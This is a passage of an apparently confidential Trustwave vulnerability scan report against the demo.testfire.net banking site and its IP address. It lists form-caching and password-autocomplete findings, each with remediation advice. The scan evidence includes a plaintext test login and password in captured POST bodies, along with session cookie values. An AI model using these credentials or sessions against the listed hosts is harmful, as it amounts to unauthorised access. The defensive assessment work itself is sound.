CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://demo.testfire.net/
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 580 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET -
https://65.61.137.117:8443/index.jsp?content=inside_contact.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Request: GET
https://65.61.137.117:8443/index.jsp?content=inside_contact.htm
HTTP/1.1
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 581 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117:8443/feedback.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 582 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 583 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117:8443/index.jsp?content=business.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Request: GET
https://65.61.137.117:8443/index.jsp?content=business.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=9B8C68C14BB9B053BB189485F1F888A4
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 584 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://demo.testfire.net/feedback.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 585 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - https://demo.testfire.net/sendFeedback
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 586 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net/index.jsp?content=business.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 587 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Limit Exceeded. 5 more item(s) were reported.
Remediation:
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 588 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117/login.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 589 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - https://demo.testfire.net:8443/doLogin
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 590 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 591 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net:8443/feedback.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 592 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net/
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 593 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - http://demo.testfire.net/sendFeedback
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 594 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Limit Exceeded. 5 more item(s) were reported.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 595 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://demo.testfire.net/login.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 596 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117:8443/index.jsp
No Caching Directives Found.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 597 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 598 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 599 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
forms Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117/index.jsp?content=business.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 600 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117/
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 601 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - http://65.61.137.117/doLogin
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 602 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117/index.jsp?content=personal.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 603 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 604 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 605 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117/feedback.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 606 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net:8443/index.jsp?content=business.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 607 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Request: GET
https://demo.testfire.net:8443/index.jsp?content=business.htm
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=44C815873649B1433E310F19F9B9450B
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117:8443/search.jsp?query=_WSETESTDATA
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 608 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Request: GET
https://65.61.137.117:8443/search.jsp?query=_WSETESTDATA
HTTP/1.1
Cookie: JSESSIONID=9B8C68C14BB9B053BB189485F1F888A4
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117:8443/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 609 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net/index.jsp?content=inside_contact.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Request: GET
https://demo.testfire.net/index.jsp?content=inside_contact.htm
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=0565231311CE173563DB02789CEE78E3
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 610 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - http://demo.testfire.net/doLogin
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 611 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - http://65.61.137.117/sendFeedback
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 612 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
The web server running on this host uses password fields that allow
auto-completion by users' browsers. This could allow a user's
credentials to be stored by the browser and subsequently exposed if
the user's computer becomes compromised.
CVSSv2: AV:L/AC:H/Au:N/C:P/I:N/A:N
Service: https
Application: apache:tomcat
Reference:
http://msdn.microsoft.com/en-us/library/ms533032.aspx
https://developer.mozilla.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 613 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
Form Name: login
Action: https://65.61.137.117:443/doLogin
Fields: passw (password)
Location: https://65.61.137.117/login.jsp
Remediation:
Modify the identified page so that the password field and the enclosing
form tags have an attribute named "autocomplete" with a value of
"off".
The web server running on this host uses password fields that allow
auto-completion by users' browsers. This could allow a user's
credentials to be stored by the browser and subsequently exposed if
the user's computer becomes compromised.
CVSSv2: AV:L/AC:H/Au:N/C:P/I:N/A:N
Service: http
Application: apache:tomcat
Reference:
http://msdn.microsoft.com/en-us/library/ms533032.aspx
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 614 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
Form Name: login
Action: http://65.61.137.117:80/doLogin
Fields: passw (password)
Location: http://65.61.137.117/login.jsp
Remediation:
Modify the identified page so that the password field and the enclosing
form tags have an attribute named "autocomplete" with a value of
"off".
The web server running on this host uses password fields that allow
auto-completion by users' browsers. This could allow a user's
credentials to be stored by the browser and subsequently exposed if
the user's computer becomes compromised.
CVSSv2: AV:L/AC:H/Au:N/C:P/I:N/A:N
Service: https
Application: apache:tomcat
Reference:
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 615 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
Form Name: login
Action: https://demo.testfire.net:8443/doLogin
Fields: passw (password)
Location: https://demo.testfire.net:8443/login.jsp
Remediation:
Modify the identified page so that the password field and the enclosing
form tags have an attribute named "autocomplete" with a value of
"off".
The web server running on this host uses password fields that allow
auto-completion by users' browsers. This could allow a user's
credentials to be stored by the browser and subsequently exposed if
the user's computer becomes compromised.
CVSSv2: AV:L/AC:H/Au:N/C:P/I:N/A:N
Service: http
Application: apache:tomcat
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 616 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
Form Name: login
Action: http://demo.testfire.net:80/doLogin
Fields: passw (password)
Location: http://demo.testfire.net/login.jsp
Remediation:
Modify the identified page so that the password field and the enclosing
form tags have an attribute named "autocomplete" with a value of
"off".
The web server running on this host uses password fields that allow
auto-completion by users' browsers. This could allow a user's
credentials to be stored by the browser and subsequently exposed if
the user's computer becomes compromised.
CVSSv2: AV:L/AC:H/Au:N/C:P/I:N/A:N
Service: http
Application: apache:tomcat
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 617 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Reference:
http://msdn.microsoft.com/en-us/library/ms533032.aspx
https://developer.mozilla.org/En/How_to_Turn_Off_Form_Autocompletio
n
Evidence:
Form Name: login
Action: http://65.61.137.117:8080/doLogin
Fields: passw (password)
Location: http://65.61.137.117:8080/login.jsp
Remediation:
Modify the identified page so that the password field and the enclosing
form tags have an attribute named "autocomplete" with a value of
"off".
The web server running on this host uses password fields that allow
auto-completion by users' browsers. This could allow a user's
credentials to be stored by the browser and subsequently exposed if
the user's computer becomes compromised.
CVSSv2: AV:L/AC:H/Au:N/C:P/I:N/A:N
Service: http
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 618 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Reference:
http://msdn.microsoft.com/en-us/library/ms533032.aspx
https://developer.mozilla.org/En/How_to_Turn_Off_Form_Autocompletio
n
Evidence:
Form Name: login
Action: http://demo.testfire.net:8080/doLogin
Fields: passw (password)
Location: http://demo.testfire.net:8080/login.jsp
Remediation:
Modify the identified page so that the password field and the enclosing
form tags have an attribute named "autocomplete" with a value of
"off".
The web server running on this host uses password fields that allow
auto-completion by users' browsers. This could allow a user's
credentials to be stored by the browser and subsequently exposed if
the user's computer becomes compromised.
CVSSv2: AV:L/AC:H/Au:N/C:P/I:N/A:N
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 619 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Reference:
http://msdn.microsoft.com/en-us/library/ms533032.aspx
https://developer.mozilla.org/En/How_to_Turn_Off_Form_Autocompletio
n
Evidence:
Form Name: login
Action: https://demo.testfire.net:443/doLogin
Fields: passw (password)
Location: https://demo.testfire.net/login.jsp
Remediation:
Modify the identified page so that the password field and the enclosing
form tags have an attribute named "autocomplete" with a value of
"off".
The web server running on this host uses password fields that allow
auto-completion by users' browsers. This could allow a user's
credentials to be stored by the browser and subsequently exposed if
the user's computer becomes compromised.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 620 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Reference:
http://msdn.microsoft.com/en-us/library/ms533032.aspx
https://developer.mozilla.org/En/How_to_Turn_Off_Form_Autocompletio
n
Evidence:
Form Name: login
Action: https://65.61.137.117:8443/doLogin
Fields: passw (password)
Location: https://65.61.137.117:8443/login.jsp
Remediation:
Modify the identified page so that the password field and the enclosing
form tags have an attribute named "autocomplete" with a value of
"off".
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 621 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat, apache:tomcat
Evidence:
application_cpe: cpe:/a:apache:tomcat, cpe:/a:apache:tomcat
application_name: apache:tomcat, apache:tomcat
application_protocol: http
ip_address: 65.61.137.117
port_number: 80
transport_protocol: tcp
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
